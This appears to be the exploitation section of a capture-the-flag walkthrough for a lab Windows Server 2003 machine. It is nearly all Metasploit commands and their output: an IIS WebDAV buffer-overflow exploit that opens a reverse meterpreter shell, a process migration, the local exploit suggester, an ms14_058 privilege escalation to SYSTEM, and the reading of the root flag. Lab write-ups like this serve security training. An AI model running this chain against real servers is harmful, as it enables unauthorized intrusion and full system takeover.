Exploitation
msfconsole
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
set RHOST 10.10.10.14
set LHOST tun0
run
We have gotten a shell, but unfortunately, when we try to run getuid it does not work and we get an error. This means we are running in an unstable process. To fix this, we have to check what processes are running on the box and migrate to one that is running with the same privileges as the meterpreter session (here, NT AUTHORITY\NETWORK SERVICE).
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
276 4 smss.exe
324 276 csrss.exe
348 276 winlogon.exe
396 348 services.exe
408 348 lsass.exe
584 396 svchost.exe
680 396 svchost.exe
740 396 svchost.exe
764 396 svchost.exe
800 396 svchost.exe
936 396 spoolsv.exe
964 396 msdtc.exe
1084 396 cisvc.exe
1104 1852 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
1124 396 svchost.exe
1180 396 inetinfo.exe
1216 396 svchost.exe
1324 396 VGAuthService.exe
1408 396 vmtoolsd.exe
1456 396 svchost.exe
1492 348 logon.scr
1628 396 alg.exe
1664 396 svchost.exe
1796 584 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
1852 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
1916 396 dllhost.exe
2304 584 wmiprvse.exe
2692 584 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
3872 1084 cidaemon.exe
3916 1084 cidaemon.exe
3944 1084 cidaemon.exe
migrate 1852
Now we have a stable working meterpreter session. We have low privileges, however, and we need to escalate to SYSTEM. Put the session in the background and use the local exploit suggester (local_exploit_suggester) to find candidate privilege-escalation modules.
search local_exploit_suggester
use local_exploit_suggester
set SESSION 1
run
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 35 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
use exploit/windows/local/ms14_058_track_popup_menu
set SESSION 1
set LHOST tun0
run
shell
meterpreter > shell
Process 1080 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>cd C:\Documents and Settings\Administrator
cd C:\Documents and Settings\Administrator
C:\Documents and Settings\Administrator>cd Desktop
cd Desktop
C:\Documents and Settings\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings\Administrator\Desktop
04/12/2017 04:28 PM <DIR> .
04/12/2017 04:28 PM <DIR> ..
04/12/2017 04:29 PM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 18,091,487,232 bytes free
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
9359e905a2c35f861f6a57cecf28bb7b
C:\Documents and Settings\Administrator\Desktop>